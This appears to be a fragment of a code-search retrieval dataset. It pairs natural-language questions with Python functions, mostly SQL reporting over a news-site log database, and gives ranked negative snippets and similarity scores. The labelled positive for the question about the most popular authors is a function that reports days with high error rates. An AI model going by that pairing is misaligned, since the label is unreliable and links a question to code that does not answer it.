n_max=10):\n return reader.UserList().get_most_popular_articles(titles=titles)[: n_max]", "def get_popular_articles():\n db = psycopg2.connect(database=DBNAME)\n c = db.cursor()\n query_popular_articles = \"\"\"\n SELECT art.title, COUNT(lg.id) as views\n FROM articles as art\n JOIN log as lg\n ON art.slug = substring(lg.path,10)\n AND lg.status = '200 OK'\n GROUP BY art.title\n ORDER BY views desc\n LIMIT 3; \"\"\"\n c.execute(query_popular_articles)\n articles = from_db_cursor(c)\n db.close()\n return articles", "def print_popular_articles():\n print(\"3 most popular articles\\n\")\n popularity_data = get_query_results(POPULARITY_QUERY)\n article_row_format = '\"{}\" — {} views'\n for title, views in popularity_data:\n print(article_row_format.format(title, views))", "def top3_articles():\n\n cur.execute(\"\"\"\n SELECT title, COUNT(*) AS article_title\n FROM article_summary\n GROUP BY title\n ORDER BY article_title DESC\n LIMIT 3;\n \"\"\")\n result = cur.fetchall()\n return result", "def print_top_articles(popular_articles):\n\n print('\\nThe three top most articles viewed are:\\n')\n for article in popular_articles:\n print(article[0] + '\\t-\\t' + str(article[1]) + ' views \\n')\n print('-------------------------------------------------------\\n')", "def getPopularArticles():\n db = psycopg2.connect(\"dbname=news\")\n c = db.cursor()\n c.execute(\" select count (*) as views, title from articles \"\n + \"left join \"\n + \"log on concat('/article/', articles.slug) = log.path \"\n + \"group by title order by views desc limit 3\")\n views = c.fetchall()\n db.close()\n return views", "def most_similar(self, article: str, topn: int = 5):\n return [article[0] for article in self._model.similar_by_word(article, topn)]", "def how_popular_most_popular(data):\r\n #list of artists\r\n artists = []\r\n for key in data:\r\n if key[-1] != \"$\":\r\n for x in data[key]:\r\n artists += [x]\r\n sorted_artists = selection_sort(artists)\r\n count = 1\r\n max_count = 1\r\n max_artists = []\r\n for i in range(len(sorted_artists)-1):\r\n #ends at second to last index because I use i and i + 1\r\n if sorted_artists[i] == sorted_artists[i+1]:\r\n count += 1\r\n else:\r\n if count == max_count:\r\n max_artists += [sorted_artists[i]]\r\n count = 1\r\n elif count > max_count:\r\n max_artists = []\r\n max_artists += [sorted_artists[i]]\r\n max_count = count\r\n count = 1\r\n return max_count", "def printTopThreeArticles():\n query = \"\"\"\n SELECT author_article_popularity_view.article,\n author_article_popularity_view.views\n FROM author_article_popularity_view\n LIMIT 3;\n \"\"\"\n cursor = connection.cursor()\n cursor.execute(query)\n results = cursor.fetchall()\n print(\"\\nTop 3 articles of all time: \")\n for i, result in enumerate(results):\n print(\"{}. \\\"{}\\\" - {:,} views\".format(i + 1, result[0], result[1]))", "def get_popular_titles():\n db = psycopg2.connect(database=DBNAME)\n c = db.cursor()\n # counting views that had status 200\n c.execute(\"select articles.title, count(*) as views \"\n \"from articles, log \"\n \"where log.path like concat('%', articles.slug, '%') \"\n \"and log.status = '200 OK' \"\n \"group by articles.title \"\n \"order by views desc limit 3\")\n results = c.fetchall()\n text_file = open(\"text.txt\", \"a+\") # append to text file\n text_file.write(\"The three most popular articles of all time are:\\n\\n\")\n # for loop to print each article\n for title, views in results:\n text_file.write(\"\\\"\" + title + \"\\\"\" + \" - \" + str(views) + \" views\\n\")\n text_file.write(\"\\n\")\n text_file.close()\n db.close", "def topArticles():\n c = db.cursor()\n c.execute(\"select titles.title, tophits.hits\\\n from tophits, titles\\\n where tophits.path = titles.slug\\\n order by hits desc limit 3;\")\n results = c.fetchall()\n c.close()\n return results", "def print_top_authors():\n\n create_view_top_articles = (\n \"CREATE VIEW top_articles AS \" +\n \"SELECT COUNT(path) AS num, path \" +\n \"FROM log GROUP BY path ORDER BY num DESC;\")\n create_view_top_authors = (\n \"CREATE VIEW top_authors as \" +\n \"SELECT sum(num) as views, author \" +\n \"FROM top_articles, articles \" +\n \"WHERE top_articles.path LIKE '%' || articles.slug GROUP BY author;\")\n get_popular_artists = (\n \"SELECT name, views \" +\n \"FROM authors, top_authors \" +\n \"WHERE top_authors.author = authors.id ORDER BY views DESC;\")\n\n print(\"\\nRunning Task: \" + print_top_authors.__doc__ + \"\\n\")\n\n conn, cur = connect()\n cur.execute(create_view_top_articles)\n cur.execute(create_view_top_authors)\n cur.execute(get_popular_artists)\n results = cur.fetchall()\n\n for title, views in results:\n print('\\t\\\"{}\\\" - {} views'.format(title, views))\n\n disconnect(conn, cur)", "def more_popular(twitter_data, a, b):\r\n \r\n a_popularity = len(all_followers(twitter_data, a)) \r\n b_popularity = len(all_followers(twitter_data, b))\r\n if a_popularity > b_popularity:\r\n return -1\r\n if a_popularity < b_popularity:\r\n return 1\r\n return username_first(twitter_data, a, b)", "def get_n_authors(soup):\n n_authors = len(soup.find_all(attrs={\"name\":\"Author\"}))\n return(n_authors)", "def _get_sorted_trend_setters(authors: list) -> dict:\n\n trend_setters = {author: authors.count(author) for author in authors}\n top_trend_setters = dict(sorted(\n trend_setters.items(), key=lambda item: item[1], reverse=True\n ))\n return top_trend_setters", "def more_popular(twitter_data, a, b):\n\n a_popularity = len(all_followers(twitter_data, a))\n b_popularity = len(all_followers(twitter_data, b))\n if a_popularity > b_popularity:\n return -1\n if a_popularity < b_popularity:\n return 1\n return username_first(twitter_data, a, b)", "def author_entity_frequency_and_popularity(self, author_id):\n return self.db.execute(u'''\n SELECT e.entity, author_freq, SUM(e.frequency) AS entity_popularity, years, max_rho\n FROM entities AS e,\n (\n SELECT entity, COUNT(DISTINCT(document_id)) as author_freq, GROUP_CONCAT(year) as years, MAX(rho) AS max_rho\n FROM entity_occurrences\n WHERE author_id == ? AND rho > ?\n GROUP BY entity\n ) as d_e\n WHERE d_e.entity == e.entity GROUP BY e.entity\n ''', (author_id, DEFAULT_MIN_SCORE)).fetchall()", "def query2():\n\n print(\"2. Who are the most popular article authors of all time?\\n\")\n\n query = \"\"\"\n SELECT authors.name, subq_author.hits FROM authors\n LEFT JOIN\n (SELECT articles.author, CAST(SUM(subq_article.hits) AS INTEGER)\n AS hits FROM articles\n LEFT JOIN\n (SELECT COUNT(log.path) AS hits, log.path FROM log\n WHERE log.path LIKE '/article/%'\n AND log.status = '200 OK' AND log.method = 'GET'\n GROUP BY log.path) AS subq_article\n ON subq_article.path LIKE '/article/'||articles.slug\n GROUP BY articles.author) AS subq_author\n ON authors.id = subq_author.author\n ORDER BY subq_author.hits DESC;\n \"\"\"\n\n response = db_query(query)\n\n for i, j in enumerate(response):\n # Convert tuple to list to allow writing. Format \"hits\" with comma\n # seperator. Print output.\n j = list(j)\n j[1] = str(format(j[1], ',d'))\n print(\" Author: '{}' - {} views\".format(*j))", "def most_popular_artist(our_data):\n counter_dict = {}\n for artist in all_artists(our_data):\n if artist in counter_dict:\n counter_dict[artist] += 1\n else:\n counter_dict[artist] = 1\n maximum_albums = max(counter_dict.values())\n artist_lists = []\n for keys, values in counter_dict.items():\n if values == maximum_albums:\n artist_lists.append(keys) \n return artist_lists", "def author_articles(self):\n return ArticlePage.objects.live().filter(author=self).order_by('-date')", "def nauthors(self):\n return self._nauthors", "def get_top_3_articles():\n query1 = \"\"\"select title, count(*) as views\n from articles, log\n where log.path like '%' || articles.slug\n group by title\n order by views desc\n limit 3;\"\"\"\n results = execute_query(query1)\n for result in results:\n print(\"- \\\"%s\\\" — %s views\" % (result[0], result[1]))", "def get_most_viewed_hashtag():\n tags = HashTags.objects.order_by('-no_of_times_viewed').distinct()[:10]\n return tags", "def get_authors_query():\n\n query = '''select authors.name, count(*) as views\n from authors, articles, log\n where authors.id = articles.author\n and substr(log.path,10)=articles.slug\n group by authors.name order by views desc;'''\n\n return query", "def question_2():\n cursor.execute(mostPopAuthors)\n output = cursor.fetchall()\n return output", "def get_most_popular_artists(data):\r\n #list of artists\r\n artists = []\r\n for key in data:\r\n if key[-1] != \"$\":\r\n for x in data[key]:\r\n artists += [x]\r\n sorted_artists = selection_sort(artists)\r\n count = 1\r\n max_count = 1\r\n max_artists = []\r\n for i in range(len(sorted_artists)-1):\r\n #ends at second to last index because I use i and i + 1\r\n if sorted_artists[i] == sorted_artists[i+1]:\r\n count += 1\r\n else:\r\n if count == max_count:\r\n max_artists += [sorted_artists[i]]\r\n count = 1\r\n elif count > max_count:\r\n max_artists = []\r\n max_artists += [sorted_artists[i]]\r\n max_count = count\r\n count = 1\r\n return max_artists", "def ef_iaf_author(self, author_id):\n total_papers = self.total_papers()\n author_entity_frequency = self.author_entity_frequency_and_popularity(author_id)\n author_papers = self.author_papers_count(author_id)\n return sorted(((\n entity,\n entity_author_freq / float(author_papers),\n log(total_papers/float(entity_popularity)),\n entity_author_freq / float(author_papers) * log(total_papers/float(entity_popularity)),\n max_rho,\n [int(y) for y in years.split(\",\")],\n ) for entity, entity_author_freq, entity_popularity, years, max_rho in author_entity_frequency), key=lambda t: t[3], reverse=True)", "def top_three_articles():\n query = \"\"\"select articles.title,\n article_path_views.views\n from articles, article_path_views\n where '/article/' || articles.slug = article_path_views.path\n order by views desc\n limit 3\"\"\"\n result_table = execute_query(query)\n\n # generate a report from table_to_report() function\n report = table_to_report(result_table, ' views')\n return \"The Top Three of Most Viewed Articles:\\n\" + report", "def top_5_news():\n top_five = []\n\n news = (db.news.find({}).sort([\n ('shares_count', pymongo.DESCENDING),\n ('comments_count', pymongo.DESCENDING),\n ('title', pymongo.ASCENDING)\n ]).limit(5))\n\n for new in news:\n top_five.append((new['title'], new['url']))\n\n return top_five", "def get_popular_article():\n query_command = \"SELECT * from popular_posts LIMIT 3\"\n query_data = run_query(query_command)\n return query_data", "def scrape_author(self, author_name, min_len=0, max_len=9999):\n search = sc.search_author(author_name)\n author = next(search)\n sc.fill(author, sections=['publications'])\n print(author.keys())\n with open(\n 'loadings\\\\authors_papers\\\\{}.txt'.format(author_name),\n 'w',\n encoding='utf-8'\n ) as file:\n for counter, pubblication in enumerate(author['publications']):\n\n if len(pubblication['bib']['title']) < min_len \\\n or len(pubblication['bib']['title']) > max_len:\n continue\n file.write(pubblication['bib']['title'])\n file.write('\\n')\n counter += 1\n if counter > self.hard_limit:\n break", "def get_movie_most_nominations(movies: list) -> str:\n pass", "def top_three_articles(cursor):\n top_articles = 'No articles found'\n try:\n cursor.execute(\"\"\"select title, count(*) as hits\n from articles, log\n where path = ('/article/' || slug)\n group by title\n order by hits desc\n limit 3\n \"\"\")\n article_views = cursor.fetchall()\n # If no articles were found, return\n if len(article_views) <= 0:\n return article_views\n\n except psycopg2.Error as e:\n print('Fetching top articles by views: \\r\\n{}'.format(e.pgerror))\n\n # If the query returns any articles, return the results.\n else:\n top_articles = 'Top articles by views: \\r\\n'\n for result in article_views:\n top_articles += ' \"{0} - {1} views\"\\r\\n'.format(result[0],\n result[1])\n return top_articles", "def pubs_by_articles_published( data ) :\n # let's be Pythonic and use counter\n result = [ (k,v) for k,v in Counter([x['SO'] for x in data]).iteritems() ]\n # now sort\n result.sort( lambda a,b : cmp(b[1],a[1]) )\n return result", "def createAuthorArticlePopularityView():\n query = \"\"\"\n CREATE TEMPORARY VIEW author_article_popularity_view AS\n SELECT COUNT(log.path) AS views,\n author_article_view.title AS article,\n author_article_view.author AS author\n FROM author_article_view LEFT JOIN log\n ON log.path LIKE '%' || author_article_view.slug || '%'\n GROUP BY article, author\n ORDER BY views DESC;\n \"\"\"\n connection.cursor().execute(query)", "def get_article_author(self, article_webpage):\n pass", "def get_top_articles(\n limit: int = 5,\n date: int = int(datetime.now().strftime(\"%Y%m%d\"))\n):\n\n res = articles_db.get_top_articles_mongo(\n articles,\n limit,\n date\n )\n\n return res", "def citing_authors(self, entities):\n result = self.db.execute(u'''SELECT DISTINCT(author_id)\n FROM \"entity_occurrences\"\n WHERE entity IN ({}) AND rho > ?'''.format(join_entities_sql(entities)), (DEFAULT_MIN_SCORE,)).fetchall()\n return [t[0] for t in result]", "def directorsOfMostMovies (movies, count):\n directorCounts = {}\n for movieInfo in movies.values():\n key = movieInfo[1]\n if key not in directorCounts:\n directorCounts[key] = 0\n directorCounts[key] += 1\n return sorted([ (v, k) for (k,v) in directorCounts.items() ], reverse=True)[:count]\n # OR:\n # directors = [ x[1] for x in movies.values() ]\n # directorSet = set(directors)\n # return sorted([ (directors.count(d), d) for d in directorSet ], reverse=True)[:count]", "def keywords(articles, top_n=25):\n\n # compute term idfs\n token_docs = [lemma_tokenize(clean(a.text)) for a in articles]\n local_term_idf = IDF(token_docs)\n\n token_docs, phrases = extract_phrases(token_docs, [a.text for a in articles], global_term_idf)\n\n titles = [a.title for a in articles]\n title_tokens = [lemma_tokenize(clean(t)) for t in titles]\n term_counts = defaultdict(int)\n for doc in token_docs:\n for t in set(doc):\n if t:\n term_counts[t] += 1\n\n title_terms = set()\n for title_tks in title_tokens:\n title_terms = title_terms | set(title_tks)\n for ph in phrases:\n if any(ph in title.lower() for title in titles):\n title_terms.add(ph)\n\n # Score terms\n term_scores = []\n for t, count in term_counts.items():\n # Ignore numbers, they are very specific to a particular event and\n # introduce noise\n try:\n float(t)\n continue\n except ValueError:\n # TODO This is a troublesome token, not sure why it's not filtered out by\n # IDF. needs more investigation\n if t == 'n\\'t':\n continue\n score = count * (global_term_idf[t] - local_term_idf[t])\n if t in title_terms:\n score *= 1.5\n term_scores.append((t, score))\n\n return sorted(term_scores, key=lambda t: t[1], reverse=True)[:top_n]", "def author_entity_frequency(self, author_id):\n return self.db.execute(u'''\n SELECT entity, COUNT(DISTINCT(document_id)) as author_freq, GROUP_CONCAT(year) as years, MAX(rho) AS max_rho\n FROM entity_occurrences\n WHERE author_id == ? AND rho > ?\n GROUP BY entity\n ''', (author_id, DEFAULT_MIN_SCORE)).fetchall()", "def AuthorsCount(self, default=None):\n return self.data.get('metadata', {}).get('author_count', default)", "def get_most_popular_posts():\n popular_posts_ids = [post.id for post in Post.objects.popular()]\n return Post.objects.filter(id__in=popular_posts_ids). \\\n add_comments_count(). \\\n prefetch_related('author'). \\\n prefetch_with_tags_and_likes(). \\\n order_by('likes_count')", "def calculate_most_popular(text, n_populars, steam=False):\n fdist = calculate_fdist(text, steam)\n term = []\n for key, value in fdist.items():\n term.append((key, value))\n term.sort(key=lambda x: int(x[1]), reverse=True)\n return term[:n_populars]", "def top_controversial(self, n):\n return top_movies", "def count_articles(all_articles):\n print(f\"There are {len(all_articles)} articles.\")", "def test_author_many_lastnames(self):\n inv_search = 'author:\"alvarez gaume, j* r* r*\"'\n spi_search = 'find a alvarez gaume, j r r'\n self._compare_searches(inv_search, spi_search)", "def test_discussion_filter_author(self):\n author_vals = (\n ('DoesNotExist', 0),\n ('admin', 1),\n ('jsocol', 4),\n )\n\n for name, number in author_vals:\n u = UserFactory(username=name)\n for i in range(number):\n thread1 = ThreadFactory(title=u'audio')\n PostFactory(thread=thread1, author=u)\n\n self.refresh()\n\n qs = {'a': 1, 'w': 4, 'format': 'json'}\n\n for author, total in author_vals:\n qs.update({'author': author})\n response = self.client.get(reverse('search.advanced'), qs)\n eq_(total, json.loads(response.content)['total'])", "def most_popular(self, n):\n return popular_tags", "def top_articles_by_views(articles, top_x):\n p = PageviewsClient()\n\n # create date string based on previous month\n now = datetime.datetime.now()\n previous_month = str(now.month - 1).zfill(2)\n if previous_month == \"00\": previous_month = \"12\"\n start_date = str(now.year) + previous_month + \"0100\"\n end_date = str(now.year) + previous_month + \"2800\"\n\n # get views\n result = p.article_views('en.wikipedia', articles, \n granularity='monthly', start=start_date, end=end_date)\n # clean results (six is used for backwards compatibility with python 2\n result = six.next(six.itervalues(result))\n sorted_articles = sorted(result.items(), \n key=operator.itemgetter(1), reverse=True)\n return sorted_articles[:top_x]", "def getAuthor(self):\n\t\tself.authorList = [submission.author for submission in self.subreddit.top(time_filter = 'day', limit = self.limits)]\n\t\treturn self.authorList", "def latest_content(request):\n latest_articles = Article.published_articles()[:5]\n latest_comments = Comment.objects.all().order_by('-pub_date')[:5]\n tags = Tag.objects.annotate(num_articles=Count('article')).order_by(\n '-num_articles')\n contributors = Contributor.objects.annotate(\n num_articles=Count('article')).order_by('-num_articles')\n return {'latest_articles': latest_articles,\n 'latest_comments': latest_comments,\n 'tags': tags,\n 'contributors': contributors,\n }", "def get_most_popular_annotations(ambiguous_entity, k=2):\n freq = [(key, len(value)) for key, value in ambiguous_entity.annotated_corpus.items()]\n freq = sorted(freq, key=lambda x: x[1], reverse=True)\n return [x[0] for x in freq[:k]]", "def most_popular(n=5):\n cars = Car.objects.annotate(review_number=models.Count('reviews'))\n sorted_cars = cars.order_by('review_number')\n return sorted_cars[:n]", "def author_visualisation(self, spam_collection):\n\n spam_author_collection = dict.fromkeys(spam_collection)\n for data, author_set in spam_collection.iteritems():\n for author in author_set:\n spam_author_collection[author] = 1\n\n for data, author_set in spam_collection.iteritems():\n for author in author_set:\n spam_author_collection[author] += 1\n\n spam_list = sorted(spam_author_collection.items(), key=operator.itemgetter(1))\n\n group = []\n values = []\n iterator = 5\n for spam in reversed(spam_list):\n group.append(spam[0])\n values.append(spam[1])\n if iterator == 0:\n break\n iterator -= 1\n\n y_pos = np.arange(len(group))\n\n plt.barh(y_pos, values, align='center', alpha=0.5)\n plt.yticks(y_pos, group)\n plt.xlabel('Number of Spam Comments')\n plt.ylabel('YouTube Author')\n plt.title('Top 5 Spamming Authors \\nin YouTube Comment Corpus')\n\n plt.show()", "def get_word_counts(messages_by_author):\n counters_by_author = {}\n for author in messages_by_author.keys():\n author_counter = Counter()\n for message in messages_by_author[author]:\n author_counter += Counter(get_words(string_to_onlyalpha(message.content)))\n counters_by_author[author] = author_counter\n return counters_by_author", "def get_most_popular_merchants(self):\n if self.model:\n return self.model.wv.index_to_key[: self.num_rec]\n else:\n print(\"train the model before performing this step\")\n return None", "def popularity(self, user_list):\n item_popular = Counter(self.train['movieId'].values)\n ret = 0\n n = 0\n print('\\nCalculate popularity: ')\n for user in tqdm(user_list):\n recom_data = self._get_recommend(user)\n for rec in set([data[0] for data in recom_data]):\n ret += math.log(1 + item_popular.get(rec))\n n += 1\n ret /= n * 1.0\n print('\\npopularity: ', ret)\n return ret", "def print_top_articles():\n\n create_view_top_articles = (\n \"CREATE VIEW top_articles AS \" +\n \"SELECT COUNT(path) AS num, path \" +\n \"FROM log GROUP BY path ORDER BY num DESC;\")\n get_popular_articles_names = (\n \"SELECT title, num \" +\n \"FROM top_articles, articles \" +\n \"WHERE top_articles.path = '/article/' || articles.slug limit 3;\")\n\n print(\"\\nRunning Task: \" + print_top_articles.__doc__ + \"\\n\")\n\n conn, cur = connect()\n cur.execute(create_view_top_articles)\n cur.execute(get_popular_articles_names)\n results = cur.fetchall()\n\n for title, views in results:\n print('\\t{} - {} views'.format(title, views))\n\n disconnect(conn, cur)", "def get_artists_most_played(session_):\n # artists = session_.query(Artist).order_by(Artist.name.asc()).paginate()\n artists = session_.query(Artist).order_by(Artist.plays.desc()).all()\n return artists", "def get_top_articles(update=False):\n # use caching to avoid running unnecessary DB queries at each page load\n key = 'top_ten'\n articles = memcache.get(key)\n\n logging.warn('MEMCACHE | Wiki articles %s' % str(articles))\n\n if (articles is None) or (len(articles) == 0) or update:\n # necessary artificial delay when a new article has just been persisted to the datastore\n if update:\n time.sleep(2)\n\n articles = db.GqlQuery('SELECT * FROM Article ORDER BY updated DESC LIMIT 10')\n articles = list(articles)\n memcache.set(key, articles)\n\n logging.warn('DATASTORE | Wiki articles count %s' % str(len(articles)))\n return articles", "def most_missed_creators(self, cache_max_age=0):\n expected_items = []\n query = u'CLAIM[195:%s] AND NOCLAIM[170]' % \\\n ',195:'.join(self.collections) # collection\n wd_queryset = wdquery.QuerySet(query)\n\n wd_query = wdquery.WikidataQuery(cacheMaxAge=cache_max_age)\n data = wd_query.query(wd_queryset)\n\n if data.get('status').get('error') == 'OK':\n expected_items = data.get('items')\n\n creator_dict = {}\n counter = 0\n for q_val in expected_items:\n q_item = self.wd.QtoItemPage(q_val)\n data = q_item.get()\n claims = data.get('claims')\n if u'P170' in claims:\n continue\n descr = data.get('descriptions').get('en')\n if descr and descr.startswith(u'painting by '):\n creator = descr[len(u'painting by '):]\n if '(' in creator: # to get rid of disambiguation addition\n creator = creator[:creator.find('(')].strip()\n if creator in creator_dict.keys():\n creator_dict[creator] += 1\n else:\n creator_dict[creator] = 1\n counter += 1\n pywikibot.output(u'Found %d mentions of %d creators' %\n (counter, len(creator_dict)))\n # output\n f = codecs.open(u'creatorHitlist.csv', 'w', 'utf-8')\n for k, v in creator_dict.iteritems():\n f.write(u'%d|%s\\n' % (v, k))\n f.close()", "def get_most_popular(self):\n\t\tpopular_rated = self.data_final[self.data_final['Rating'] == 10]\n\t\tpopular_jokes = popular_rated.groupby('JokeID').count().reset_index()\n\t\tpopular_jokes = popular_jokes[['JokeID','Rating']]\n\t\tpopular_jokes.columns = ['JokeID','Number_rated10']\n\t\ttop_joke = popular_jokes.sort_values(by=['Number_rated10'], ascending=False).head(1)\n\t\ttop_joke_val = top_joke['JokeID'].values[0]\n\t\tjokes_list = sorted(set(self.data_final['JokeID']))\n\t\tjoke_num = jokes_list.index(top_joke_val)\n\t\ttop_joke_desc = self.data_jokes[self.data_jokes['JokeID'] == top_joke_val].values[0][1]\n\n\t\treturn top_joke_desc, joke_num", "def get_authors_count(self, institution):\n return self.db.execute(u'''SELECT COUNT(*) FROM authors WHERE institution==?''', (institution,)).fetchall()[0][0]", "def most_read_book(self):\n reading_max = 0\n most_reads = \"\"\n for book in self.books.keys():\n rating = book.get_average_rating()\n if rating > reading_max:\n most_reads = book\n reading_max = rating\n else:\n continue\n return most_reads", "def count_word_usage(counters_by_author, word_list):\n specific_word_counter = {}\n for author in counters_by_author.keys():\n word_counter = Counter()\n for item in counters_by_author[author]:\n for word in word_list:\n if word in item:\n print(item)\n word_counter[word] += counters_by_author[author][item]\n specific_word_counter[author] = word_counter\n return specific_word_counter" ]
[ "0.8464116", "0.8395627", "0.8325832", "0.8321721", "0.81574434", "0.8025931", "0.7990663", "0.77915514", "0.778007", "0.76863235", "0.7682032", "0.7626295", "0.755735", "0.75209177", "0.74950725", "0.7390242", "0.7380563", "0.7352149", "0.73245054", "0.7269289", "0.7168644", "0.7097385", "0.7026836", "0.7019098", "0.69753695", "0.68759996", "0.6850596", "0.6830917", "0.67495525", "0.6726395", "0.67226905", "0.6663313", "0.66345185", "0.6554077", "0.6538726", "0.65218043", "0.64450175", "0.63916576", "0.6331363", "0.63088685", "0.6284564", "0.62661475", "0.61916816", "0.61582637", "0.6132734", "0.6120747", "0.6076682", "0.6028067", "0.6027632", "0.60107714", "0.60028774", "0.5970349", "0.59578186", "0.5956711", "0.5946971", "0.59469664", "0.5940188", "0.5931153", "0.5917123", "0.59155095", "0.58567554", "0.5846613", "0.583932", "0.5808969", "0.57854813", "0.5781466", "0.57789546", "0.5769289", "0.57679594", "0.57466143", "0.57278633", "0.57258743", "0.5707005", "0.57029", "0.5697988", "0.56897694", "0.5683986", "0.5676653", "0.56738305", "0.56109685", "0.56027204", "0.55958086", "0.5592611", "0.55762315", "0.5574971", "0.5567629", "0.5567177", "0.554649", "0.5497936", "0.5479982", "0.5475885", "0.5474041", "0.5461326", "0.54600626", "0.5457332", "0.5448662", "0.54406965", "0.5438228", "0.54372185", "0.5435583" ]
0.67932266
28
Who are the most popular article authors of all time?
def getWorstDays(): db = psycopg2.connect("dbname=news") c = db.cursor() c.execute(" select c.* from" + "(select a.* , b.* , " + "(cast( b.total as decimal(16,4))/a.total)*100 as percent from" + " (select count(*) total , time::timestamp::date as timea " + "from log group by timea order by timea) as a, " + "(select count(*) total , time::timestamp::date as timea " + "from log where status <> '200 OK'" + "group by timea order by timea ) as b " + "where a.timea = b.timea) as c where c.percent > 1;") days = c.fetchall() db.close() return days
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_mostPopularAuthors():\n\n query = \"\"\"\n SELECT authors.name,COUNT(*) as views\n FROM articles join authors\n ON articles.author=authors.id\n JOIN log ON log.path LIKE ('/article/' || articles.slug)\n GROUP BY authors.name\n ORDER BY views DESC\n \"\"\"\n\n posts = execute_query(query)\n print('\\nWho are the most popular article authors of all time?')\n for author, views in posts:\n print(author + \" - \" + str(views) + \" views\")", "def most_popular_authors():\n\n results = query_database(QUERIES[1])\n print('\\nWho are the most popular article authors of all time?\\n')\n for author, views in results:\n print(' * {} -- {} views'.format(author, views))", "def most_popular_authors():\n print '2. The most popular authors are...'\n return (\"\"\"SELECT authors.name, count(*) as num from\"\"\"\n \"\"\" authors, articles, log WHERE SUBSTRING (log.path FROM 10)\"\"\"\n \"\"\" = articles.slug and articles.author = authors.id and\"\"\"\n \"\"\" log.path != '/' Group By authors.name ORDER by num\"\"\"\n \"\"\" DESC LIMIT 20;\"\"\")", "def most_popular_article_authors():\n\n # To print information\n information_string = '2. The most popular article ' \\\n 'authors of all time are:\\n'\n\n # Query string\n query = \"\"\" select x.author , count(1) as qtd from (\n SELECT b.name as author\n FROM articles a join authors b on(a.author = b.id)\n join log c on(c.path = '/article/' ||a.slug)\n ) x group by x.author order by 2 desc;\"\"\"\n\n print(information_string)\n for result in query_db(query):\n print('\\t' + str(result[0]) + ' - ' + str(result[1]) + ' views')\n\n print(\"\\n\")", "def popular_authors() :\n query = \"\"\"SELECT authors.name,count(*) AS total_views FROM authors,articles,log WHERE log.path like concat ('/article/',articles.slug)\n AND articles.author=authors.id group by authors.name order by total_views desc\"\"\"\n result = get_data(query)\n print(\" 2. The most popular articles authors of all time:\")\n print(\"\")\n for record in result :\n print(' ' +' ' + str(record[0]) + ' -' + ' ' + str(record[1]) + ' ' +'views')\n print(\" \")", "def top_authors():\n\n cur.execute(\"\"\"\n SELECT author, count(*) AS article_author\n FROM article_summary\n GROUP BY author\n ORDER BY article_author DESC;\n \"\"\")\n result = cur.fetchall()\n return result", "def get_most_popular_authors():\n\tdb = psycopg2.connect(database=DBNAME)\n\tc = db.cursor()\n\tc.execute(\" select t1.name,count(*) as total from authors as t1, articles as t2,log as t3 where t3.path=concat('/article/',t2.slug) and t1.id=t2.author group by t1.name order by total desc limit 3;\")\n\tdata = c.fetchall()\n\tdb.close()\n\n\treturn data", "def get_popular_authors():\n db = psycopg2.connect(database=DBNAME)\n c = db.cursor()\n query_popular_authors = \"\"\"\n SELECT aut.name, COUNT(lg.id) AS views\n FROM articles AS art\n JOIN log AS lg ON art.slug = SUBSTRING(lg.path,10)\n AND lg.status = '200 OK'\n JOIN authors AS aut ON aut.id = art.author\n GROUP BY aut.name\n ORDER BY views desc; \"\"\"\n c.execute(query_popular_authors)\n authors = from_db_cursor(c)\n db.close()\n return authors", "def popular_authors():\n query = \"\"\"select authors.name, sum(views)\n from authors, articles, article_path_views\n where authors.id = articles.author\n and '/article/' || articles.slug = article_path_views.path\n group by authors.name\n order by sum desc\"\"\"\n result_table = execute_query(query)\n\n # generate a report from table_to_report() function\n report = table_to_report(result_table, ' views')\n return \"Authors and Their Articles' Total Views:\\n\" + report", "def author_rank():\n db, c = connect(DBNAME)\n c.execute(\"select name, count(name) as views from \\\"authorpath\\\" \"\n \"group by name order by views desc\")\n author_table = c.fetchall()\n db.close()\n print \"\\nMost Popular Article Authors of All Time:\"\n for author in author_table:\n print str(author[0]) + \" - \" + str(author[1]) + \" views\"", "def most_viewed_authors():\n query = \"\"\"\n SELECT authors.name, COUNT(*) AS views\n FROM articles\n JOIN log\n ON log.path = '/article/' || articles.slug\n JOIN authors\n ON authors.id = articles.author\n WHERE log.status ='200 OK'\n GROUP BY authors.name ORDER BY views DESC LIMIT 3;\n \"\"\"\n results = psql_connection(query)\n\n print(\"Most viewed authors:\")\n for result in results:\n print '{author} - {count} views'.format(\n author=result[0], count=result[1])", "def get_popular_authors():\n db = psycopg2.connect(database=DBNAME)\n c = db.cursor()\n # counting views that had status 200\n c.execute(\"select authors.name, count(*) as num \"\n \"from articles, authors, log \"\n \"where articles.author = authors.id \"\n \"and log.path like concat('%', articles.slug, '%') \"\n \"and log.status = '200 OK' \"\n \"group by authors.name order by num desc\")\n results = c.fetchall()\n text_file = open(\"text.txt\", \"a+\") # append to text file\n text_file.write(\"The most popular authors of all time are:\\n\\n\")\n # for loop to print each author\n for name, num in results:\n text_file.write(\"\\\"\" + name + \"\\\"\" + \" - \" + str(num) + \" views\\n\")\n text_file.write(\"\\n\")\n text_file.close()\n db.close", "def print_top_authors():\n\n output = get_query_results(\n '''SELECT authors.name, COUNT(*) AS views\n FROM authors\n JOIN(SELECT articles.title, articles.author FROM articles\n JOIN log ON log.path=CONCAT('/article/', articles.slug))\n AS popular\n ON authors.id=popular.author\n GROUP BY name\n ORDER BY views DESC;'''\n )\n print(\"\\nPopularity of Authors: \\n\")\n for author, views in output:\n print(\"\\\"{}\\\" -- {} views\".format(author, views))", "def get_top_authors():\n query2 = \"\"\"select name, count(*) as views\n from authors, articles, log\n where authors.id = articles.author\n and log.path like '%' || articles.slug\n group by name\n order by views desc;\"\"\"\n results = execute_query(query2)\n for result in results:\n print(\"- %s — %s views\" % (result[0], result[1]))", "def print_popular_authors(authors):\n for (author, views) in authors:\n print \"%s - %d views\" % (author, views)", "def printTopAuthors():\n query = \"\"\"\n SELECT author_article_popularity_view.author,\n SUM(author_article_popularity_view.views) AS total_views\n FROM author_article_popularity_view\n GROUP BY author_article_popularity_view.author\n ORDER BY total_views DESC;\n \"\"\"\n cursor = connection.cursor()\n cursor.execute(query)\n results = cursor.fetchall()\n print(\"\\nTop authors of all time: \")\n for i, result in enumerate(results):\n print(\"{}. {} - {:,} views\".format(i + 1, result[0], result[1]))", "def topAuthors():\n c = db.cursor()\n c.execute(\"select name, sum(hits) as hits\\\n from authorhits group by name\\\n order by hits desc;\")\n results = c.fetchall()\n c.close()\n return results", "def most_popular_articles():\n print '1. The most popular articles are...'\n return (\"\"\"SELECT articles.title, COUNT(*) as num FROM articles, log\"\"\"\n \"\"\" WHERE SUBSTRING (log.path FROM 10) = articles.slug 